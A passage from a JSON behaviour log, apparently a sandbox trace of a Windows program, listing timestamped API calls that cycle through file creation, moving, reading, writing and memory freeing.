"timestamp": "2016-02-16 17:41:54,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,821", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,861", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,871", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,021", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,021", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,031", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,031", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,041", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,041", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,051", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,081", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,091", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:55,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:55,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 